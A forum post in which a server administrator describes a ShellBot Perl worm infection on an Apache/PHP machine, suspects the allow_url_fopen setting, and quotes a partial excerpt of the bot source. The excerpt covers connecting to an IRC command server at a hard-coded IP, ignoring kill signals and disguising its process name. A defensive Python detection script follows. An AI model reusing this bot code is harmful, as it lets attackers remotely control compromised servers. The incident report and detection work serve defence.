One of my machines was compromised by the shellbot worm. I don't have phpbb installed but I do have php running with apache2. I saw that a perl script spawned by apache was eating up all of my CPU. I tried killing the process; it had been running for 13 hours. I wasn't able to kill it, so I thought something was strange. I grepped for "apache" in the temp directory and found this file: sess_3539283e27d73cae29fe2b80f9293f60. I vimmed the file and found the text "shellbot" in it. I googled shellbot and found that it goes after php and phpbb vulnerabilities. Since I don't have phpbb, I reasoned that php was the problem.
I thought about what I could have done to compromise security. 20 hours ago I changed a setting in /etc/apache2/conf/php.ini: I changed allow_url_fopen = Off to On.
Code:
; Whether to allow the treatment of URLs (like http:// or ftp://) as files.
; allow_url_fopen = On
; Closed for security - <robbat2@gentoo.org>
#allow_url_fopen = Off
allow_url_fopen = Off
I commented out the worm code and changed the allow_url_fopen to off and rebooted the machine. Everything seems to be running fine but I know I have to reformat the hard disk and start over again. I've got a lot of web sites and mail accounts on this machine so it's going to be a major pain in the butt. But that's the way it goes. Live and learn. : (
Below is a snippet of the worm.
Code:
#hellBOT - FBI TEAM Corporation
##
## ShellBOT - FBI TEAM Corporation
##
## 0ldW0lf - effbeeye81@aol.com
## - www.security.cnc.net
##
##
##
################# CONFIGURATION #################################################################
#my $processo = '/usr/local/apache/bin/httpd -DSSL'; # Process name that will show up in ps #
##----------------------------------------------################################################
#my $linas_max='8'; # Avoids flooding :) after X lines #
##----------------------------------------------################################################
#my $sleep='4'; # it sleeps X seconds #
###################### IRC #####################################################################
#my @adms=("zamel00","buju"); # Administrator nick
##
##----------------------------------------------################################################
#my @canais=("#vvvvv 214112"); # If there is a password ("#channel :password") #
##----------------------------------------------################################################
#my $nick='fbigov'; # Bot nick. If it is already in use it will show up #
# # with a random number at the end #
##----------------------------------------------################################################
#my $ircname = 'fbigov'; # User ID
##
##----------------------------------------------################################################
#chop (my $realname = `uname -a`); # Full Name #
##----------------------------------------------################################################
#$servidor='61.77.30.70' unless $servidor; # IRC server to be used #
# # if none is given as an argument #
##----------------------------------------------################################################
#my $porta='6667'; # IRC server port #
################# SHELL ACCESS #################################################################
#my $secv = 1; # 1/0 to enable/disable shell access #
################################################################################################
#
#my $VERSAO = '0.2';
#
#$SIG{'INT'} = 'IGNORE';
#$SIG{'HUP'} = 'IGNORE';
#$SIG{'TERM'} = 'IGNORE';
#$SIG{'CHLD'} = 'IGNORE';
#$SIG{'PS'} = 'IGNORE';
#
#use IO::Socket;
#use Socket;
#use IO::Select;
#chdir("/");
#$servidor="$ARGV[0]" if $ARGV[0];
#$0="$processo"."\0"x16;;
#my $pid=fork;
#exit if $pid;
#die "Problema com o fork: $!" unless defined($pid);
#
#
#
#my $dcc_sel = new IO::Select->new();
#
##############################
## B0tchZ in the veins hehe :P #
##############################
#
#$sel_cliente = IO::Select->new();
#sub sendraw {
# if ($#_ == '1') {
# my $socket = $_[0];
# print $socket "$_[1]\n";
# } else {
# print $IRC_cur_socket "$_[0]\n";
# }
#}
#
#
#sub conectar {
# my $meunick = $_[0];
# my $servidor_con = $_[1];
# my $porta_con = $_[2];
#
# my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$servidor_con", PeerPort=>$porta_con) or return(1);
# if (defined($IRC_socket)) {
# $IRC_cur_socket = $IRC_socket;
#
# $IRC_socket->autoflush(1);
# $sel_cliente->add($IRC_socket);
#
# $irc_servers{$IRC_cur_socket}{'host'} = "$servidor_con";
# $irc_servers{$IRC_cur_socket}{'porta'} = "$porta_con";
# $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
# $irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost;
# nick("$meunick");
# sendraw("USER $ircname ".$IRC_socket->sockhost." $servidor_con :$realname");
# sleep 1;
# }
#
#}
#my $line_temp;
#while( 1 ) {
# while (!(keys(%irc_servers))) { conectar("$nick", "$servidor", "$porta"); }
# delete($irc_servers{''}) if (defined($irc_servers{''}));
# &DCC::connections;
# my @ready = $sel_cliente->can_read(0);
# next unless(@ready);
# foreach $fh (@ready) {
# $IRC_cur_socket = $fh;
# $meunick = $irc_servers{$IRC_cur_socket}{'nick'};
# $nread = sysread($fh, $msg, 4096);
# if ($nread == 0) {
# $sel_cliente->remove($fh);
snipped the remaining 90%....
If anybody knows exactly what allowed this worm to get through please let me know, so I can guard against it in the future. I'm guessing that the file write setting I discussed above was the problem but I'm not sure.
Cheers,
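Two defender-side checks that follow from the clues in the post above, written as an added example for this page (not code from the original post or from Gentoo): one resolves the effective value of allow_url_fopen from a php.ini text the way PHP reads it (last uncommented assignment wins; both ";" and "#" open a comment in old php.ini), and the other scans PHP session files for strings that appear in the bot source quoted above. The php.ini excerpts and the session-file contents are constructed samples modelled on what the post shows; the indicator list, the function names and the default "sess_" prefix are this example's own assumptions.

```python
"""Defender-side checks for the two clues in the post: the php.ini directive
that was flipped, and a PHP session file carrying Perl source.
Added example; the samples below are constructed, not captured."""
import os
import re
from typing import Dict, List, Optional

# Strings present in the bot source quoted in the post (constructed list;
# extend it with whatever your own sample contains).
BOT_INDICATORS = (
    "ShellBOT",
    "IO::Socket",
    "$SIG{'TERM'} = 'IGNORE'",
    "sub conectar",
    "sub sendraw",
)

# Constructed php.ini excerpts: the directive turned on, then turned back off.
INI_ENABLED = """\
; Whether to allow the treatment of URLs (like http:// or ftp://) as files.
; allow_url_fopen = On
#allow_url_fopen = Off
allow_url_fopen = On
"""
INI_DISABLED = """\
; Whether to allow the treatment of URLs (like http:// or ftp://) as files.
; allow_url_fopen = On
#allow_url_fopen = Off
allow_url_fopen = Off
"""

# Constructed session files: one holding Perl source, one holding normal
# serialized PHP session data.
SESSION_BOT = """\
#!/usr/bin/perl
## ShellBOT - FBI TEAM Corporation
use IO::Socket;
$SIG{'TERM'} = 'IGNORE';
sub conectar {
"""
SESSION_BENIGN = 'user|s:5:"alice";cart|a:0:{}'

_ON_VALUES = {"on", "1", "true", "yes"}


def php_ini_effective(ini_text: str, key: str) -> Optional[str]:
    """Last uncommented value of `key` in a php.ini text, or None if never set.
    Lines starting with ';' or '#' are comments; an inline ';' starts a
    trailing comment; surrounding quotes are stripped from the value."""
    pattern = re.compile(r"^" + re.escape(key) + r"\s*=\s*(.*)$", re.IGNORECASE)
    value = None
    for raw in ini_text.splitlines():
        line = raw.strip()
        if not line or line[0] in ";#":
            continue
        m = pattern.match(line)
        if m:
            value = m.group(1).split(";", 1)[0].strip().strip('"\'')
    return value


def allow_url_fopen_enabled(ini_text: str) -> bool:
    """True when allow_url_fopen resolves to an 'on' value."""
    value = php_ini_effective(ini_text, "allow_url_fopen")
    return value is not None and value.lower() in _ON_VALUES


def scan_session_text(text: str) -> List[str]:
    """Indicators (matched case-insensitively) found in a session file's contents.
    A PHP session holds serialized application data, never Perl source,
    so any hit marks the file for inspection."""
    lowered = text.lower()
    return [ind for ind in BOT_INDICATORS if ind.lower() in lowered]


def scan_session_dir(path: str, prefix: str = "sess_") -> Dict[str, List[str]]:
    """Scan every `prefix*` file under `path` (e.g. /tmp); returns {name: indicators}."""
    hits: Dict[str, List[str]] = {}
    for name in os.listdir(path):
        if not name.startswith(prefix):
            continue
        try:
            with open(os.path.join(path, name), "r", errors="replace") as fh:
                found = scan_session_text(fh.read())
        except OSError:
            continue  # unreadable or vanished between listdir and open
        if found:
            hits[name] = found
    return hits


if __name__ == "__main__":
    print("allow_url_fopen enabled (before):", allow_url_fopen_enabled(INI_ENABLED))
    print("allow_url_fopen enabled (after): ", allow_url_fopen_enabled(INI_DISABLED))
    print("indicators in sample session:    ", scan_session_text(SESSION_BOT))
    print("indicators in benign session:    ", scan_session_text(SESSION_BENIGN))
```

Run it against the real session directory with `scan_session_dir("/tmp")` on a suspect host. Two points the quoted source itself settles: the bot installs `$SIG{'TERM'} = 'IGNORE'` (and the same for INT and HUP), which is why a plain `kill` had no effect, whereas SIGKILL cannot be caught or ignored; and allow_url_fopen is not a hole by itself, it only lets an existing include/fopen bug in a PHP application reach remote content instead of the local filesystem, so the setting is worth keeping off until the application code has been reviewed.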